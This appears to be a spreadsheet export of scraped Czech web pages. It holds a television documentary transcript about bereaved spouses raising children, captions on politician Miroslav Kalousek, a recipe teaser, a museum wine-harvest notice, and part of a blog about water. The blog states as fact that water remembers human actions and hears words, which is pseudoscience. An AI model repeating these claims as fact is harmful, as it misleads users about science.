eskymačka s eskymákem. My bychom umrzli, jim není zima, snídají nanuky a eskyma. My bychom umrzli, jim není zima, snídají nanuky a eskyma. -A Luky teda půjde na ten pinčes? -Jo. -Půjde tam, jo? Mně se ulevilo vlastně až po tom roce a čtvrt, kdy bylo ukončený to dědický řízení, kdy vlastně většina těch věcí byla vyřízená. Já doufám, že tohle bude už naposled dneska -Ahoj. -Tak čau. Českej šiml úřední prostě... Když oni po mně něco chtěli, tak to muselo být hned, ale když já jsem něco potřebovala, tak bylo to složitý. To jsou všechno podklady, různý dokumenty od vlastně úmrtního listu až po různý rozsudky a úpravu styku s prarodiči. Zápisy do katastru, pak teda přepis bytu na katastru a různý zápisy z jednání na OSPOD, před soudama a tak. Nečekaný to samozřejmě je. Hlavně se na to nedá vůbec připravit. -Teodorovi jsou 2 roky a je to náročný. Chybí tam i vlastně nějaký ten mužský element. Ptá se. Mluvíme spolu o tom. Snažím se mu to tak nějak úměrně jeho věku vysvětlovat. Jsem i v kontaktu s dětskou psycholožkou, abych... Abych mu to co nejlépe podala. -Tohle tu modrý. -Hm. -Kde to asi patří? -Tam nahoru. -Už nemáme? -Už nemáme? Ukaž. Ještě máme. Tady. Dívej se. Tady máme ještě. -Tady nahoře? -Hm. Ano. -Hele! -Tak ukaž! -Tady. -Tak počkej. Najdem nějakou ještě. -Vydrž. Tady pak je. -Tady je hezčí. -Tady je taťka. -To je na vítání občánků do života. -A tady je taťka. No jo. Tam je taky taťka. -Tady je spoustu též. -Tady jste hráli na klavír s taťkou -To si moc nepamatuji, ale pamatuji si, že jsem zvučil několikrát. -No. Tady jste zvučili s taťkou. A tady je ta fotka s těma bicíma. Hraje na bicí na místní ZUŠ. To trénovali dřív právě s manželem. Takže to jsme potom byli nuceni nějakým způsobem řešit. Takový ty mužské role typu měnit kola na autě, technickou na autě řešit. Takže to člověk využívá těch známých tady okolo, co má. A takový ty drobný opravy, nebo něco přivrtat, nebo něco takovýho, tak to využívám právě v rámci toho Nadačního fondu Vrba té možnosti, že sem dojíždí ten hodinovej manžel. -Hotovo. -Hotovo? Super. -Je do školy potřeba něco zítra? -Ne. Tak jo. Mazli, mazli, pomazli. Čo? Počkej, Maruško, nedělej to. Mazli, mazli... Za pár minut půjdeš. Tak pojď vedle si hrát. -Bude autobus? -No, pojedeme. To víš, že jo. My vždycky potkáme, on má rád náklaďáky. -Tak klidně do půl pátý. Můžu i do pěti, kdybys nestíhala. -Dobře. -Když tak mi zavolej, kdyby ses tam držela. Znáš to, jak je to na úřadech. To nebude tak rychlé. Jo, jo, jasně. A k tomu obědu? Jo, ten špenát je v ledničce, jsi říkala. -Je tam špenát, jsou tam brambory, je tam vajíčko. -To stačí jenom ohřát. -Jo. Teď moc nechtěl ráno jíst nebo tu svačinku, takže myslím si, že to snad sní všecko. -To je starej hřbitov? -TO je starší část. -Aha. -A Tom je pohřbený v té nové části. -A to jste tady měli hrob? -Ne. To jsem zařizovala až po smrti Toma. -Tak fajn, že tady bylo místo. -V té nové části jsou. Tam právě jsou místa. Tak. Už tam budeme. Zapálíme tatínkovi svíčku, jo? -Zapálíš tam ohýnek. To máte nové teda? -Je to nové a teď je to ve fázi, kdy je to jakoby rozdělané. Je tam akorát hlína. Nějakým způsobem jsme se to snažili jakoby upravit. A vlastně náhrobní desku, náhrobní kámen budeme mít až v červenci. A vlastně tam nahoře, jak jsou ty kolumbária, tak vlastně v té druhé řadě, tak tam je. -Jo támhle. Před tím až. -Tam je pohřbený. -Táta! -Táta tam je, ano. Trefíš, Teoušku? Víš, kde je schovanej? -Tam je táta, říká mamka. -Chodíme každej týden zapálit svíčku. Vzpomínali jsme vlastně na něj tak, jak na něj vzpomínáme každý den. -Za maminkou! -Pojď za mnou. Zapálíme spolu svíčku? -Jo. Co to je? -To je svíčka. -No tady. -No tady, tady. Včera to bylo půl roku. Manžel umřel, bylo to pondělí. V sobotu měl pohřeb, takže během těch pár dnů se muselo všechno zařídit. Je to určitě těžký, když člověk ve 28 letech řeší to, kde má pohřbít svýho manžela. Že musí přemýšlet nad tím, kdyby náhodou jemu se i něco stalo, tak aby měl být kde pohřbený vlastně. Kluci! Pojďte. Ještě to dobalíme a pojedeme. Plyšáky ještě vezmeme. A balón si vemte. To ne. To nebudem brát. Už je plno. Jdeme. Kluci, dáme to do kufru. Tak. Tady ho dej. Kluci, tady máte plavání, tady máte ručníky. Filípku, tady je ta knížka. Večer budeš číst. Musíš mě nahradit teďka. Jedna půlka je Matýska, jedna půlka je tvoje. Papuče. Tady je to Matýska, tady je to tvoje. Takže jo. Takže to můžu teda zabalit, jo? -Je to všechno? -Jo. -A ty máš zabalený nabíječky? -Jo. -A telefony. -Hm. -Máme všechno? -Jo. -Oni jsou už samostatní. Máme to nastavený, že Filda musí jakoby mně pomoct a nahradit jakoby tu mamku. Hlavně vidí, že toho mám moc. I sami to řeknou: Tati, ty toho máš moc. My ti pomůžeme. No. Marek se toho nebojí. Hlavně, kluci, poslouchat prosím. Když se řekne nehrát, tak nehrát. Ne že prostě mně budou volat, že je nějakej problém. Jo? Nebo když řekne, že se půjde tama, tak se půjde tama. Ano? -Vylezem, pojď. -Kluci, jsme tady. -Vem si batůžek. -Tak šup. -Je to tady dobrý. -Je to tady dobrý? Ty brďo! Kluci, jdeme na to. Určitě ta žena tam chybí. Je to cítit prostě a přijde mi to, že teď musím řešit takový ty ženský problémy. Kolikrát si říkám, že su jak kdyby napůl chlap a žena. Je to takový jiný. Tohle je Matýsek. Kluci, pomáhejte mně. Teď to člověk vidí mnohem víc a vidí to jinak. Prostě že ta ženská přijde dom a vaří, pere, stará se o děti. Prostě zvládne toho daleko víc než ten chlap. Určitě v té organizaci. Moje manželka prostě byla v tomhle úplně dokonalá. Co je? Co je? Co je? Co blbneš? Budeš tady mít kámoše. To uteče. -Maty, něco pro tebe mám. -Maťo, dívej! My jsme si pro tebe připravili překvapení. -Tak co ty na to? -No tak ta je teda! -Paráda. -Ty jo! -Hned máš lepší náladu, co? -Děkujeme. A tady budeš mít pak napsaný: Maty Vrána. Ano? No pojďte! Já su připravenej. Běžíme, běžíme a dorážka. Čau, Teoušku! Ahoj! -Hele, teta. -Čauky. -Ahoj. -Ahoj. -Jak se máš? -Jde to. -Co ty? -V rámci možností dobrý. -A budete mít fotku vygravírovanou? -Ještě úplně nevím, ještě se rozhoduju. Ještě se rozhoduju i skrz jakoby nápisy. -Ještě na to mám měsíc času. -Jo, jo. -My to prožíváme nějak jako manželky, jako partnerky, děti to prožívají jinak. Tu ztrátu toho rodiče. A určitě jinak to prožívá matka, které zemřelo dítě. Takže je potom dobrý si to vlastně tak jako nacítit a naposlouchat, zpracovat si to, kde to mám já, tu ztrátu a s tou vděčností a s tím jako to uzavřít a nadechnout se pro to další. -Koukni, tady paní, podívej se, co všechno má. -Pán? -Paní. To je paní. -Co tam má? Paní. Co tam má? -Spinká. Ano. Spinká. Spinká. -Nedokážu si představit, že bych momentálně neměla Vrbu v zádech, protože ty informace i v té záplavě těch emocí a všeho je strašně těžké si jakkoliv dohledat. A tohle je prostě obrovská pomoc. -Focení, motorka, kytara. Asi prostě jít ven, nebýt v baráku. To asi je tak nějak to, co mám v plánu. Protože ty večery prostě... Jako je to o něco lepší, ale prostě doléhá to. Samozřejmě nejhorší jsou takový ty výročí. Mně třeba vadí aj kolikrát i rodinný oslavy, kdy mi každej říká: Tak přijď na oslavu. Mně to prostě nedělá dobře. Zaprvé su tam sám, ta Zuzka mně tam chybí. A když tam vidím ty lidi v párech, tak je to prostě špatný, no. -Já jsem v nějaké velké finanční tíži po smrti manžela nebyla díky rodině a přátelům, ale do té práce jsem jít musela, abych prostě přispěla do rodinného rozpočtu a aby člověk si dělal nějaké rezervy. Takže momentálně do práce chodím. I díky právě vrběnce si můžu dovolit chodit do práce. -Bezvadný! Zatleskám. Jsi šikula. Zatlač. Ano. Šup. Koukni. A je tam! -Momentálně ještě řeším splacení hypotéky. Teď už je to vlastně půlrok, co to řešíme. Než v podstatě člověk dodá všechny ty papíry a vyhoví všem těm požadavkům, které ta pojišťovna prostě požaduje, tak se to strašně táhne. Musela jsem si vzít i právníky, protože když jsem se chtěla třeba informovat o tom, zda je ta hypotéka splacená, tak mně prostě ty informace neposkytli. -Máťo, tady. Pojď si někam sednout. Najdi si někde místo. Maťulo, tak pusu! Budeme tady, neboj. Manželka tady dělala asistentku. Byla to vlastně pro ni jakoby vysněná práce. Vcelku jakoby mě mrzí to, že už měla podepisovat aj jakoby tu smlouvu ten den, kdy se to stalo, jakoby měli jí to prodlužovat. A možná i ty nervy proto ona měla, proto jakoby spěchala a prostě se stalo to, co se stalo. -A já mám, představte si to, první domácí úkol. A ten domácí úkol budou mít vaši rodiče. No tak samozřejmě, ta máma tady chybí. To určitě. I když babička s náma jde, tak určitě je to jiný. Ale my to máme už tak nějak spolu daný, že mamka vždycky na nás kouká svrchu, že? -Hm. Že jo? -Maty Vrána! -Tři, dva, jedna, teď! Tři, dva, jedna, teď! -Kam jsem se za ty dva roky posunula? Člověk si asi jako nepřipouští takový ty drobný problémy. Podpora toho nejbližšího okolí, těch kamarádů, přátel je obrovská. Paradoxně to drhne jako nejvíc od Mirkových rodičů. Tam domluva není možná žádná. Rodiče zesnulého manžela nejsou schopni mě respektovat natolik, že se se mnou tahají soudně o děti. Děti mají nějakou představu, kdy chcou u nich být, a prarodiče bohužel mají úplně jinou představu o tom, kdy budou s dětmi. Bohužel ta jejich představa je větší, nebo rozsah toho styku s dětmi je větší, než ta představa dětí. A samozřejmě každá matka bude hájit svoje děcka. A bohužel tam jako nastaly až takové tahanice a nepochopení z jejich strany, že prostě měli potřebu to dát k soudu a řešit to soudně, což jako pro mě je nepochopitelný. -Tady na hřbitově se hroby musí kolaudovat, tak momentálně máme trochu problémy s kolaudací, který jsou momentálně v řešení. A zkolaudovat se to nechce z důvodu toho, že vlastně tady ten kousíček jakoby přesahuje a nelícuje to vlastně s tím základem. Jako hrob byl hodně finančně náročný, ale já jsem měla štěstí v tom, že vznikla sbírka na Doniu a díky vlastně dárcům a lidem, který mě vlastně podpořili, jsem si ten hrob mohla dovolit. Jinak bych si ho dovolit nemohla. Momentálně teď řeším to, že mě vlastně banka vložila do registru dlužníků z toho důvodu, že pojišťovna vlastně neproplatila celou částku, že tam zůstaly k proplacení nějaké covid poplatky, covid úroky, úplně teďka nevím. A z toho důvodu, že to celé neproplatila, tak jsem spadla do registru dlužníků. Přišel mně vlastně dopis, kde mi bylo sděleno, že vlastně jsem do registru dlužníků byla zařazena. A překvapená jsem z toho byla. Tak. Budeš tam ještě dávat nějakou barvičku? Ještě červenou. Tady pak je ještě žlutá. -Já bych si přál na Vánoce auto na dálkový ovládání, potom Deník malého poseroutky. A potom ještě lego. -Jako přijdou chvíle, kdy je to lepší, kdy je to horší, to je samozřejmý, ale už to není tak jako extrémní nahoru, dolů, jak to bývalo. Beruška jako ze začátku si hrála, a najednou na ní přišlo a začala brečet. Takže to už taky jako s věkem vymizelo. Teď je to spíš o tom, že prostě se vezme něco, namaluje se obrázek, dá se za okno. A spíš už takový jako hezký vzpomínky, jak by se to dělalo, kdyby tady byl taťka, taťka by to řekl takhle. Spíš už jako takový pozitivní vzpomínky. -To jsem dostala od Mikiho. -Na Den matek. Na Den matek. A je to 20 důvodů, proč tě mám rád. -Protože se mnou jezdíš na dovolenou. Protože mi děláš jídlo. -Protože mi umýváš hračky. -Kupuješ hračky. -Protože se o nás staráš. -Protože mi pomáháš. -Protože jsi nejlepší máma. Mamka. -Když jsem to četla poprvé, tak furt jako to člověk tahá a furt říká: Co ještě tam jako bude? Jako fakt jsem musela zamáčknout slzu. -A kdybys to napsal tátovi, co bys mu tam napsal? -Protože je hodnej. Protože si se mnou hraje. A pak už nevím. -No tak ta tragédie, je to 5 týdnů a asi pár dnů k tomu. Havárie na dálnici. Žena jela v rámci rekvalifikace na svoji první pracovní cestu. Ta rekvalifikace byla směrem k psychoterapii a jela od prvního klienta. A souhrou nešťastných okolností dostala ránu zezadu a na místě zemřela. -Sem? -Ne, ne, ne! -Tak. Dobrý. -Ne. -Tak to zarovnej a jedem. -Já to neumím zarovnat. -To není zmrzlé. -Tak to tam dej. -A je to. Byl jsem vždycky člověk analytický, přemejšlel jsem o budoucnosti, co budu dělat za 5 let. Měl jsem plány. Anebo jsem se nostalgicky díval do minulosti. A moc jsem tou přítomností neuměl žít. A najednou to ze sekundy na sekundu byla pouze a jen přítomnost a potřeba tu další sekundu přežít do té další a další. A teď samozřejmě totální relativizace toho, co může být v životě průšvih a co ne. V podstatě od té doby mě vytočilo máloco. Opravdu. Teď jsem to říkal jenom kamarádovi. To vdovectví je takový jako kurz stoicismu a buddhismu dohromady. Totálně jedno. Jak je to ještě čerstvé a furt se mi ta hlava zdráhá tomu nějak jako uvěřit, akceptovat to. Je to v takových vlnách. Když jsem tak jako tady seděl, tak nějak v tý pivnici a všichni si tam povídali, protože už jsou to zkušení vdovci a vdovy a znají se, tak jsem si říkal: Sakra, kde to jsem? Já sem nepatřím, mně se to nestalo, tohle. Prostě ne. To je blbost jako a tak. A pak jsem si s nima začal povídat po nějakým tom druhým pivu a najednou vidím, že si fakt rozumíme. A včera jsem velmi necitlivě tady jednomu kolegovi, kamarádovi asi v tuto chvíli už, sdělil: Hele, my si nemáme co říct. Ale ne v tom smyslu, že nemáme témata, ale v tom smyslu: My si nemusíme dělat říkat. My to víme. A říkal jsem mu, že je to hrozně příjemný. A v tu chvíli jsem si vlastně uvědomil: Ale já sem patřím. Já patřím mezi ně. -Řadu z vás čekají první Vánoce, tak jsem si říkala, jestli by nestálo za to posdílet ty, co už mají tu zkušenost. Jaký to pro vás bylo? Co jako bylo dobrý, co naopak si říkáte zpětně: To jsem možná mohla udělat jinak. Nějaká inspirace pro ty, kteří do toho letos jdou poprvé. -Děti rozhodně že chtěj bejt doma. A děti jsou na prvním místě, takže zůstali jsme doma. Neměnili jsme vůbec nic. Krom naší tradice teda, že chodíme do zoo. Tím, že nemám, jak to podělit, tak nemůžu vyběhnout s dětma ven, přivolat Ježíška a dát dárky pod stromek. To nejde, -Takže... -Jak jsi to vymyslela? -Předávám klíče sousedům a zaúkoluju, kde jsou dárky. Vždycky se někdo obětavej najde, kdo to udělá. -Pro nás to budou první Vánoce, takže nevím, co bude, ale si myslím, že to určitě já teda vořvu jako blázen. Ale zažil jsem vlastně tenhle ten rok, kdy ještě žena byla a slavil narozeniny Máťa , starší syn začátkem července. A pak jsme slavili narozeniny Lilči, která je koncem srpna, a vlastně žena už tady nebyla. Tak to byly opravdu hodně těžký chvíle, ačkoliv to byly radostné chvíle. Na jednu stranu, že tady ještě je, a na druhou stranu, že tady už není. -S tím se asi budeme... Ne asi. S tím se určitě musíme naučit žít. Ale dovolit si to třeba ořvat. A brečet. -Anebo si najít nějakej rituál, jak to poslat tam, kam to má jít. Jako ve smyslu, že si někdy tak jako vzpomenu a zavolám to do nebe. Nebo někdo má deník a někam to napíše a pošle. Ono to zní jako trošku triviálně, ale myslím, že tyhlety rituály nebo i symbolický jako věci mají svou sílu a hodnotu. -Tak co ta písnička? Jdem na to? -Jo. Jdem na to. Hajdom, hajdom, tydlidom, hajdom, hajdom, tydlidom. Anděl se jim ukázal, do Betléma , jim kázal. Hajdom, hajdom, tydlidom, hajdom, hajdom, tydlidom. Výborný! Já si přeju, abychom už nějak začali znova. A myslím si, že se nám to daří. Mám novou přítelkyni, takže úplně jinak jako fungujou kluci s ní, co se týče třeba jídla. Matýsek začíná víc jíst. A vidím to i na sobě, že člověk je víc jakoby pohodě. Pak děti jsou v pohodě a je to takové zrcadlo prostě. Pokud rodič bude v pohodě, tak aj ty děti budou v pohodě. To je asi ten nejhezčí dárek, co pod stromeček chcu. Budeš zpívat dneska se mnou u stromečku? -Možná. -Co? -Možná. -Možná? -Jo. -A jakou máš rád tu písničku? -Žádnou. -Máš. Jakou? -Radši. -Co? -Já to nechci říkat. -Jakou? -Nechci to říkat. Ty to víš. -Je to tajný? -Jo. -Dobře. Tak já se nechám překvapit. -Jo. PÍSNIČKA Přeju si, aby byl svět jako dřív, abychom i bez dárků měli se rádi. Ať každý člověk, co je živ, všimne si, jak život pádí... -Já vnímám, že s náma ty rodiny rostou. A obrací se na mě třeba ve chvíli, kdy já už si myslím, že jsou zastabilizovaný. To je ta následnost, kdy oni sami by si zase o pomoc neřekli, protože řeknou: My jsme vděční a vážíme si toho, že jste nám v té prvotní fázi jako pomohli. Anička! -Vlastně stále řeší to úmrtí toho rodiče a že se to odráží na problémech, co třeba mají s dětma. Že s dětma to téma roste. Takže na tom já se učím a posouvám a hledám ty cesty, jak jim jako pomoci dál. A když už, tak Filip. Kolik tady máme Filipů? -Bylo to krásný, ale jako byly ve mně i takový jakoby smutný okamžiky, kdy jsem si uvědomovala, proč vlastně tady jsem, protože kdyby se nestalo to, co se stalo, tak bych tady dnes nebyla. Hodně těžký rok je za námi a já bych řekla, že teď opravdu, jak se láme ten rok, tak mám jakoby pocit, jako bych se opravdu znova nadechla. -Tak připravit, pozor a... Půjdem spolu do Kyčmolu , dujdaj, dujdaj, dujdaj, dá... ...Ježíšku, panáčku, já tě budu kolébat. Vánoce, Vánoce přicházejí, zpívejme, přátelé. Po roce Vánoce, Vánoce přicházejí, šťastné a veselé. Výborně! Česká televize 2024</t>
  </si>
  <si>
    <t>177730</t>
  </si>
  <si>
    <t>20241001_35_2997337698_ffe2f44541589b335d9a.html</t>
  </si>
  <si>
    <t>ffe2f44541589b335d9a</t>
  </si>
  <si>
    <t>PŘEHLEDNĚ: Kalousek odchází z TOP 09. Jak šel čas s ním a jeho stranou</t>
  </si>
  <si>
    <t>PŘEHLEDNĚ: Kalousek odchází z TOP 09. Jak šel čas s ním a jeho stranou Kalousek ministrem financí Po volbách v roce 2006 se společně s ODS a se Stranou zelených pokoušel sestavit vládu. Předseda ČSSD Jiří Paroubek mu tehdy nabídl post ministra financí a lidovcům účast v menšinové vládě s tolerancí komunistů. Kalousek tuto nabídku přijal i přesto, že svým voličům před volbami slíbil, že se rozhodně nebude podílet na vládě, pokud ji budou podporovat komunisté. 20 fotografií Spolupráce s KSČM vyvolala velkou kritiku i uvnitř lidovců. Neshody ve straně vyvrcholili až tím, že Kalousek odešel z postu předsedy strany. Ministrem financí se nakonec stal Bohuslav Sobotka . Post ministra financí získal až ve vládě Mirka Topolánka mezi lety 2007 až 2009. Smuteční hosté přichází na poslední rozloučení s bývalým ministrem, poslancem, senátorem a hradním kancléřem Karlem Schwarzenbergem . Na snímku bývalý člen Poslanecké sněmovny Miroslav Kalousek . (9. prosince 2023) Autor: Ladislav Křivan, MAFRA Na výjezdním zasedání v Plzni slavila strana TOP 09 v čele s Karlem Schwarzenbergem a místopředsedou Miroslavem Kalouskem 5 let od založení. Zároveň byli představeni kandidáti, kteří se budou ucházet o post plzeňského primátora a na místo senátora. (16. června 2016) Autor: Marek Podhora, MAFRA Miroslav Kalousek , bývalý ministr financí a člen TOP 09, často kritizoval Miloše Zemana za jeho politická rozhodnutí a styl vedení. Zeman naopak kritizoval Kalouska a jeho politiku. V jednom rozhovoru uvedl, že Kalousek je inteligentní, ale jeho neúspěch přičítal závisti jeho spolustraníků. (10. dubna 2013) Autor: Michal Šula, MAFRA Politici Jiří Pospíšil a Miroslav Kalousek odcházejí z posledního rozloučení s Janem Kačerem (5. června 2024). Autor: Ladislav Křivan, MAFRA Veřejnost a kolegové se v historické budově Národního divadla naposledy loučí s hercem a režisérem Janem Kačerem , který zemřel 24. května ve věku 87 let. Na snímku bývalý člen Poslanecké sněmovny Miroslav Kalousek . (5. června 2024) Autor: Ladislav Křivan, MAFRA Na pivo s Mirkem Kalouskem (3. dubna 2024) Autor: Ota Bartovský, MAFRA Miroslav Kalousek Autor: MAFRA Miroslav Kalousek a Andrej Babiš (snímek z 19. října 2017) Autor: ČTK První místopředseda TOP 09 Miroslav Kalousek Autor: Petr Topič, MAFRA Schůze koalice. Miroslav Kalousek a Jiří Paroubek (2006) Autor: Nguyen Phuong Thao, MAFRA Miroslav Kalousek a jeho proměny v politice Autor: iDNES.cz Předsedkyně TOP 09 Markéta Pekarová a šéf klubu TOP 09 Miroslav Kalousek Autor: Petr Topič, MAFRA Představitelé pěti stran oznámili, že žádají o mimořádnou schůzi s hlasováním o nedůvěře vládě. Zleva předseda STAN Vít Rakušan, šéf Pirátů Ivan Bartoš , šéf poslanců TOP 09 Miroslav Kalousek , předseda ODS Petr Fiala a lídr KDU-ČSL Marek Výborný Autor: Josef Kopecký, iDNES.cz Jiří Pospíšil a Miroslav Kalousek hovoří před začátkem Sněmovny. Autor: iDNES.cz Kalousek ve Sněmovně připomněl Okamurovo vystoupení na tabletu Autor: facebook.com/miroslav.kalousek Jednání Poslanecké sněmovny o důvěře vládě Andreje Babiše . (10. 1. 2018) Autor: Petr Topič, MAFRA Poslanci se přetahovali o ceduli All lives matter Autor: Tereza Tykalová Autor Tereza Tykalová</t>
  </si>
  <si>
    <t>997660</t>
  </si>
  <si>
    <t>1010</t>
  </si>
  <si>
    <t>20241001_36_2997331763_d7e395c4f94ade388a9c.html</t>
  </si>
  <si>
    <t>d7e395c4f94ade388a9c</t>
  </si>
  <si>
    <t>Pečený bůček s ovocnou salsou</t>
  </si>
  <si>
    <t>Pečený bůček s ovocnou salsou 1.10.2024 Bůček: 700 g vepřového boku bez kosti několik kuliček nového koření 2 bobkové listy několik kuliček celého pepře Pivní směs: 250 ml piva 2 lžíce worcesterové omáčky 2 lžíce sójové omáčky 1 lžíce medu 1 lžíce ostrého… Autor: Kuchařka</t>
  </si>
  <si>
    <t>8</t>
  </si>
  <si>
    <t>23</t>
  </si>
  <si>
    <t>20241001_37_3091257229_a478f74192f064fa1e56.html</t>
  </si>
  <si>
    <t>a478f74192f064fa1e56</t>
  </si>
  <si>
    <t>Vinobraní v&amp;nbsp;NZM ve Valticích oslaví letošní sklizeň koštem a prohlídkou muzea</t>
  </si>
  <si>
    <t>Shrnutí Vinobraní v&amp;nbsp;NZM ve Valticích oslaví letošní sklizeň koštem a prohlídkou muzea Jaká byla letošní úroda hroznů? Přijměte pozvání na Vinobraní v muzeu, které se uskuteční první říjnovou sobotu 5. 10. v Národním zemědělském muzeu ve Valticích. „Pojďte s námi oslavit sklizeň a přivítat příchod budoucího vína v podobě sladkého burčáku,“ zve na tradiční akci do muzea ředitel NZM Valtice Vilém Křeček. Na programu bude návštěvníky oblíbená ochutnávka hroznů různých odrůd révy, která doplní nabídku burčáků a vína na valtickém náměstí, ale také další doprovodné aktivity. Atraktivní výstavy Děti se mohou těšit na tvořivou hroznovou dílnu a další tematické úkoly. K vidění bude expozice vinařských lisů, tentokráte ozvláštněná podzimním dýňovým aranžmá, aktuálními výstavami Zázrak jménem fotosyntéza nebo Krajina na bankovkách. Národní zemědělské muzeum zve také na končící živou výstavu méně známých odrůd rajčat a paprik. Valtické vinobraní pořádá město Valtice ve spolupráci s Národním zemědělským muzeem a Střední vinařskou školou Valtice . Národní zemědělské muzeum je státní příspěvková organizace zřizovaná Ministerstvem zemědělství. Zabývá se zejména tematikou zemědělství, lesnictví, myslivosti, rybářství, zahradnictví, potravinářství, zpracování zemědělských produktů, vývoje venkova a kulturní krajiny. Národní zemědělské muzeum má kromě hlavní výstavní budovy v Praze také dalších pět poboček – Čáslav , zámek Kačina, zámek Ohrada, Valtice a nově otevřené muzeum v Ostravě . Jednotlivé pobočky jsou zaměřeny tak, aby svou vědecko-výzkumnou, akviziční a prezentační činností komplexně pokrývaly zemědělství a jeho příslušné obory v celé šíři. Muzeum Valtice se věnuje především vinařství, zahradnictví a ochraně krajiny. V roce 2018 a 2019 prošla budova muzea rozsáhlou rekonstrukcí a vznikly zde tři nové interaktivní expozice. Tato realizace získala třetí místo za Muzejní počin roku v rámci cen Národní soutěže muzeí Gloria musaealis 2019. Virtuální prohlídka NZM Valtice. Více na www.nzm.cz. Zdroj: NZM Pro přidávání komentářů se musíte nejdříve přihlásit. The form was sent successfully. An error occured. Autor: Pokyny pro autory | Redakční rady | Formulář pro oponenty</t>
  </si>
  <si>
    <t>322</t>
  </si>
  <si>
    <t>431</t>
  </si>
  <si>
    <t>20241001_38_2997204021_bdd8964d025d5cb0574a.html</t>
  </si>
  <si>
    <t>bdd8964d025d5cb0574a</t>
  </si>
  <si>
    <t>HLADINA</t>
  </si>
  <si>
    <t>Shrnutí HLADINA Pod dojmem nedávných zaplavených událostí a všech mokrých zpráv vyzní možná tento blog poněkud nepatřičně…, nicméně n aplánovaly jsme si toto téma už na začátku roku a letní sucho nasvědčovalo spíše tomu, že vodní hladinu budeme muset hledat. Velká část našich výrobků byla již hotová a nafocená, když začaly stoupat hladiny řek. Téma tedy nevynecháme, protože si vážíme naší – své práce. Snad tedy jen ke čtení bude možná potřeba trochu víc tolerance a jiný úhel pohled u. Doufáme, že i přes to všechno se bude líbit ... * * * Díváme-li se na vodní plochu, pak z povrchu (ze souše či z lodi) vidíme JEN hladinu; vše, co je pod ní, nám zůstává většinou skryto. Zatím jen málokdo uznává, že voda je živá a inteligentní entita, ale existují již výjimky – například na Novém Zélandu v roce 2018 prohlásili zákonem jednu z řek živou bytostí. Voda sama v sobě ukrývá desítky anomálií. O všech vlastnostech a zvláštnostech vody nemáme ani potuchy, přestože se s ní denně potkáváme a manipulujeme s ní nejrůznějšími způsoby. Fyzika říká: „ ... k dyby voda neměla povrchové napětí, neznali bychom vodní hladinu tak, jak vypadá dnes, všude by byla pěna . “ Dost nepředstavitelné, že? Povrchové napětí vzniká díky polaritě vody. To vytváří na hladině jakousi „tenkou blanku“ – membránu, díky níž voda nepění (nebo jen málo). Díky vlastnostem vodíku a kyslíku, z nichž je voda složená, jsou molekuly vody relativně blízko sebe, proto je poměrně hustá (největší hustotu má voda při 4 °C). Kdyby tomu tak nebylo, voda by se rychle vypařila, její bod varu by byl hluboko pod nulou. Při pokojové teplotě by tedy neexistovala voda v kapalném stavu. Ovšem kdyby byla jen malinko hustší, znali bychom ji pouze jako led. Je tedy dílem velmi přesného fyzikálně-chemického nastavení, že vodu známe převážně jako tekutinu. Povrchové napětí vody lze zrušit přidáním saponátu, čímž ji ovšem znehodnotíme. Malinko jinak fungují šetrné biosaponáty; nicméně procento těch, kteří je používáme, je stále k uzoufání mizivé. Povrchové napětí vody umožňuje pohyb po hladině některým lehoučkým druhům hmyzu. Člověku pouze tehdy, když zmrzne (anebo umí-li chodit po vodě ?))). Víme už, že v eškerá voda na planetě Zemi pochází z vesmíru – obsahují ji meteority, komety, planety. Kolik jich asi muselo dopadnout na Zemi, než se vytvořily oceány ? Právě teď pro mnohé z nás bolestně platí, že voda je dobrý sluha, ale špatný pán... Je tu ale voda opravdu jen proto, aby byla naším „sluhou“? My lidé si příliš rádi přivlastňujeme vše, čím Země oplývá, a příliš často sklouzáváme do zneužívání (nejen přírodních) darů, dokonce jim říkáme „zdroje“. Drancováním moří a decimováním vodního života si ale sami podřezáváme větev pod sebou. Myslíte, že jsme z obliga, když naše území neomývá moře? Omyl. Světová VODA je propojená po celé planetě a je nekonečným médiem i úložištěm informací. Voda si pamatuje vše, co s ní my, lidé, děláme . Voda dokonce slyší i naše slova, naši hudbu a přenáší tuto informaci v sobě do všech částí planety. Hm..., musíme tedy zpívat ještě mnoho léčivých písní, než ji uzdravíme. Proto i my, suchozemci, buďme rádi za mořské rezervace, které konečně vznikají a velmi se osvědčují. Je jich však stále ještě žalostně málo v porovnání se souší, či dokonce s tím, jak by to bylo potřeba. Není tu řeč jen o poptávce po mořských rybách a lavině suši-barů; kondice oceánů a moří je zásadní pro rozložení vlhkosti atmosféry, proudění, srážek… a potažmo i lokálních záplav ve vnitrozemí. Buďme vděčni za každý počin, vedoucí k nápravě; u nás je to třeba znovuvytvoření mokřadů v přírodě a opětovné zavlhčení dříve meliorovaných luk. Právě při povodních se mnohá záplavová území mění v jezera s hladinou a je jen chybou člověka, že to nerespektuje. Hladině můžeme dát mnoho přívlastků: klidná, zčeřená, rozbouřená, zurčící, zvlněná, ale i záplavová… a stále vidíme jen ten povrch. Ale co je POD hladinou ? :-D Jako první nám asi vytanou na mysli ryby. O nich už dávno víme, že vůbec nejsou němými bytostmi, jak se kdysi tvrdilo. Ba naopak – všichni obyvatelé vod disponují mnohdy vysokou inteligencí a komunikačními schopnostmi, které nám zůstávají stále dost utajené. Nejen delfíni a velryby, ale i manty a mnoho dalších ryb i korýšů vydává spousty zvuků, které však na pozadí lidského hluku nemůžeme slyšet. Hluk lodních motorů, sonarů i turistů ruší nejen přirozenou rybí komunikaci pod vodou, ale i na skalách hnízdící ptáky. Odborníci na ekobioakustiku zjistili, že všechen (pod)mořský život je vystaven obrovské hlukové zátěži, produkované lidmi. Díky následnému stresu, který v době covidového lockdownu nakrátko ustal, totiž bleskurychle nastalo i očividné zotavení a ozdravení všech živočišných i rostlinných populací ve všech mořích. Žel právě jen nakrátko. Komunikace pod vodou má své výhody; voda totiž vede zvuk několikrát rychleji a lépe než vzduch. Vodní tvorové tak komunikují přes celé oceány už nesrovnatelně déle, než to umí celý náš slavný internet. O emočním životě vodních obyvatel zatím biologové vedou spory, ale kdo může s jistotou říct, že neexistuje? ... právě tato chobotnice byla očividně naštvaná! Slovy básníka: „ ... Moře nepláče bolestí; jeho zpěv ustává z důvodu nedostatku zpěváků !“ Pod hladinou najdeme i hojné stopy lidského snažení – vraky lodí, trosky měst a ztracených kultur, také supermoderní hotely, potápěče, batiskafy; pod hladinou možná jednou vyrostou celá města, až souš bude zaplavená vodou z roztátých ledovců. Pod hladinou je už teď ale spousta lidských odpadků. Mnoho chytráků totiž hřeší právě na fakt, že pod hladinu většinou není vidět. Pod hladinou můžeme spatřit i ptáky či savce, lovící svou obživu. Oni rozhodně 